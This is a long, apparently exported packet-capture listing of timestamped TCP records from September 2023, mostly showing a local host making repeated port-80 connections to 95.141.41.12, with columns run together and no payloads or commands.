                                                                                              Sep 28, 2023 06:03:45.355699062 CEST805013295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:45.355899096 CEST5013280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:45.356044054 CEST5013280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:45.556524992 CEST805013295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:45.560587883 CEST805013295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:45.560956001 CEST5013280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:45.670079947 CEST5013280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:45.670423031 CEST5013380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:45.868339062 CEST805013395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:45.868585110 CEST5013380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:45.868678093 CEST5013380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:45.870475054 CEST805013295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:45.870556116 CEST5013280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:46.027663946 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:03:46.066648006 CEST805013395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:46.071696043 CEST805013395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:46.072001934 CEST5013380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:46.105834961 CEST4980580192.168.2.3178.237.33.50
                                                                                              Sep 28, 2023 06:03:46.185615063 CEST5013380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:46.185817003 CEST5013480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:46.382766962 CEST805013495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:46.382848978 CEST5013480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:46.383045912 CEST5013480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:46.383316994 CEST805013395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:46.383491039 CEST5013380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:46.496769905 CEST24504980181.19.131.36192.168.2.3
                                                                                              Sep 28, 2023 06:03:46.501811028 CEST498012450192.168.2.381.19.131.36
                                                                                              Sep 28, 2023 06:03:46.580040932 CEST805013495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:46.585059881 CEST805013495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:46.585231066 CEST5013480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:46.590156078 CEST4980580192.168.2.3178.237.33.50
                                                                                              Sep 28, 2023 06:03:46.701142073 CEST5013480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:46.701407909 CEST5013780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:46.712502956 CEST24504980181.19.131.36192.168.2.3
                                                                                              Sep 28, 2023 06:03:46.898129940 CEST805013495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:46.898287058 CEST5013480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:46.905469894 CEST805013795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:46.905555964 CEST5013780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:46.905780077 CEST5013780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:47.109935045 CEST805013795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:47.135225058 CEST805013795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:47.135530949 CEST5013780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:47.248302937 CEST5013780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:47.248459101 CEST5013880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:47.446177006 CEST805013895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:47.446374893 CEST5013880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:47.446495056 CEST5013880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:47.452974081 CEST805013795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:47.453035116 CEST5013780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:47.590161085 CEST4980580192.168.2.3178.237.33.50
                                                                                              Sep 28, 2023 06:03:47.643388987 CEST805013895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:47.651704073 CEST805013895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:47.652060032 CEST5013880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:47.764223099 CEST5013880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:47.764744043 CEST5013980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:47.955619097 CEST805013995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:47.955689907 CEST5013980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:47.955879927 CEST5013980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:47.961133003 CEST805013895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:47.961227894 CEST5013880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:48.147332907 CEST805013995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:48.154459953 CEST805013995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:48.154654026 CEST5013980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:48.263747931 CEST5013980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:48.263994932 CEST5014180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:48.454929113 CEST805013995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:48.455147028 CEST5013980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:48.457649946 CEST805014195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:48.457743883 CEST5014180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:48.457916975 CEST5014180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:48.651842117 CEST805014195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:48.657435894 CEST805014195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:48.657656908 CEST5014180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:48.763787985 CEST5014180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:48.764383078 CEST5014280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:48.958000898 CEST805014195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:48.958239079 CEST5014180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:48.958296061 CEST805014295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:48.958420038 CEST5014280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:48.958585978 CEST5014280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:49.152638912 CEST805014295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:49.157121897 CEST805014295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:49.157315016 CEST5014280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:49.263621092 CEST5014280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:49.263887882 CEST5014380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:49.402657032 CEST4980580192.168.2.3178.237.33.50
                                                                                              Sep 28, 2023 06:03:49.451396942 CEST805014395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:49.451611042 CEST5014380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:49.451721907 CEST5014380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:49.457952976 CEST805014295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:49.458173990 CEST5014280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:49.642741919 CEST805014395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:49.649451971 CEST805014395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:49.649645090 CEST5014380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:49.763923883 CEST5014380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:49.764508963 CEST5014580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:49.951710939 CEST805014395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:49.952047110 CEST5014380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:49.961064100 CEST805014595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:49.961358070 CEST5014580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:49.961503029 CEST5014580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:50.157938004 CEST805014595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:50.161426067 CEST805014595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:50.161695004 CEST5014580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:50.263710022 CEST5014580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:50.264247894 CEST5014680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:50.452286959 CEST805014695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:50.452611923 CEST5014680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:50.452698946 CEST5014680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:50.460385084 CEST805014595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:50.460639954 CEST5014580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:50.640453100 CEST805014695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:50.645049095 CEST805014695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:50.645256996 CEST5014680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:50.747750044 CEST5014680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:50.748049021 CEST5014780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:50.935724020 CEST805014695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:50.936094046 CEST5014680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:50.955152035 CEST805014795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:50.955405951 CEST5014780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:50.955492020 CEST5014780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:51.032408953 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:03:51.161339998 CEST805014795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:51.165437937 CEST805014795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:51.165826082 CEST5014780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:51.279388905 CEST5014780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:51.279649019 CEST5014980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:51.466581106 CEST805014995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:51.466680050 CEST5014980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:51.466914892 CEST5014980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:51.484195948 CEST805014795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:51.484482050 CEST5014780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:51.654071093 CEST805014995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:51.658335924 CEST805014995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:51.658405066 CEST5014980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:51.764353037 CEST5014980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:51.764975071 CEST5015080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:51.951390982 CEST805014995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:51.951551914 CEST5014980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:51.959312916 CEST805015095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:51.959646940 CEST5015080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:51.959734917 CEST5015080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:52.153728008 CEST805015095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:52.154897928 CEST805015095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:52.155292034 CEST5015080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:52.263365030 CEST5015080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:52.263698101 CEST5015180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:52.457402945 CEST805015095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:52.457871914 CEST5015080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:52.463434935 CEST805015195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:52.463622093 CEST5015180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:52.463706970 CEST5015180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:52.663736105 CEST805015195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:52.669749022 CEST805015195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:52.669965982 CEST5015180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:52.779524088 CEST5015180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:52.779833078 CEST5015380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:52.902648926 CEST4980580192.168.2.3178.237.33.50
                                                                                              Sep 28, 2023 06:03:52.964310884 CEST805015395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:52.964657068 CEST5015380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:52.964740038 CEST5015380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:52.980015039 CEST805015195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:52.980401993 CEST5015180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:53.149096966 CEST805015395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:53.153615952 CEST805015395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:53.153949022 CEST5015380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:53.263607025 CEST5015380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:53.263957024 CEST5015480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:53.448584080 CEST805015395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:53.448771954 CEST5015380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:53.458859921 CEST805015495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:53.459068060 CEST5015480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:53.459290981 CEST5015480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:53.654467106 CEST805015495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:53.658987045 CEST805015495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:53.659094095 CEST5015480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:53.763463974 CEST5015480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:53.763984919 CEST5015580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:53.958722115 CEST805015495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:53.959126949 CEST5015480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:53.960473061 CEST805015595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:53.960664988 CEST5015580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:53.960896969 CEST5015580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:54.157341003 CEST805015595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:54.162070990 CEST805015595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:54.162370920 CEST5015580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:54.279200077 CEST5015580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:54.279644966 CEST5015780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:54.474304914 CEST805015795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:54.474596024 CEST5015780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:54.474708080 CEST5015780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:54.476280928 CEST805015595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:54.476500988 CEST5015580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:54.670053005 CEST805015795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:54.674062967 CEST805015795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:54.674484968 CEST5015780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:54.779273033 CEST5015780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:54.780363083 CEST5015880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:54.974004984 CEST805015795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:54.974430084 CEST5015780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:54.979526997 CEST805015895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:54.979865074 CEST5015880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:54.979945898 CEST5015880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:55.179306984 CEST805015895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:55.184381008 CEST805015895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:55.184660912 CEST5015880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:55.295092106 CEST5015880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:55.295782089 CEST5015980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:55.483470917 CEST805015995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:55.483725071 CEST5015980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:55.484029055 CEST5015980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:55.494249105 CEST805015895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:55.494507074 CEST5015880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:55.636893034 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:03:55.670739889 CEST805015995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:55.671941996 CEST805015995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:55.672002077 CEST5015980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:55.784621954 CEST5015980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:55.785099983 CEST5016180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:55.972634077 CEST805015995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:55.972966909 CEST5015980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:55.981482029 CEST805016195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:55.981695890 CEST5016180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:55.981837034 CEST5016180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:56.178385973 CEST805016195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:56.185595036 CEST805016195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:56.185882092 CEST5016180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:56.294923067 CEST5016180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:56.295299053 CEST5016280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:56.489820957 CEST805016295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:56.490114927 CEST5016280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:56.492130995 CEST805016195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:56.492336035 CEST5016180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:56.502615929 CEST5016280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:56.696482897 CEST805016295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:56.702812910 CEST805016295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:56.703111887 CEST5016280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:56.815087080 CEST5016280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:56.815452099 CEST5016380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:57.005521059 CEST805016395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:57.005693913 CEST5016380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:57.005888939 CEST5016380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:57.008759022 CEST805016295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:57.008949995 CEST5016280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:57.196166039 CEST805016395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:57.201234102 CEST805016395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:57.201399088 CEST5016380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:57.310183048 CEST5016380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:57.310492039 CEST5016580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:57.500319004 CEST805016395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:57.500407934 CEST5016380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:57.509912968 CEST805016595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:57.509990931 CEST5016580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:57.510277987 CEST5016580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:57.709726095 CEST805016595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:57.714339018 CEST805016595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:57.714679003 CEST5016580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:57.826575994 CEST5016580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:57.827088118 CEST5016680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:58.021017075 CEST805016695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:58.021099091 CEST5016680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:58.021306038 CEST5016680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:58.026377916 CEST805016595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:58.026462078 CEST5016580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:58.215123892 CEST805016695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:58.219438076 CEST805016695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:58.219587088 CEST5016680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:58.326394081 CEST5016680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:58.326858044 CEST5016780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:58.520476103 CEST805016695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:58.520690918 CEST5016680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:58.525751114 CEST805016795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:58.525980949 CEST5016780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:58.536619902 CEST5016780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:58.736226082 CEST805016795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:58.740362883 CEST805016795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:58.740570068 CEST5016780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:59.029366970 CEST5016780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:59.030029058 CEST5016980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:59.226327896 CEST805016995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:59.226656914 CEST5016980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:59.228936911 CEST805016795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:59.229336023 CEST5016780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:59.477060080 CEST5016980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:59.673851013 CEST805016995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:59.675337076 CEST805016995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:59.675424099 CEST5016980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:59.779218912 CEST5016980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:59.779686928 CEST5017080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:59.902510881 CEST4980580192.168.2.3178.237.33.50
                                                                                              Sep 28, 2023 06:03:59.975775957 CEST805017095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:59.975837946 CEST805016995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:59.976003885 CEST5016980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:59.976396084 CEST5017080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:59.976396084 CEST5017080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:00.172404051 CEST805017095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:00.173718929 CEST805017095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:00.173811913 CEST5017080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:00.279139042 CEST5017080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:00.279525995 CEST5017180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:00.466772079 CEST805017195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:00.466973066 CEST5017180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:00.467086077 CEST5017180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:00.475121021 CEST805017095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:00.475254059 CEST5017080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:00.560715914 CEST5017180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:00.654783010 CEST805017195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:00.655107975 CEST5017180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:00.659027100 CEST805017195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:00.659210920 CEST5017180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:00.670854092 CEST5017380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:00.868324995 CEST805017395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:00.868582010 CEST5017380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:00.868675947 CEST5017380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:01.066282034 CEST805017395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:01.067363977 CEST805017395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:01.067536116 CEST5017380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:01.170166969 CEST5017380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:01.170588017 CEST5017580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:01.367875099 CEST805017595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:01.367938042 CEST805017395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:01.368207932 CEST5017380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:01.368454933 CEST5017580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:01.368454933 CEST5017580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:01.565655947 CEST805017595.141.41.12192.168.2.3
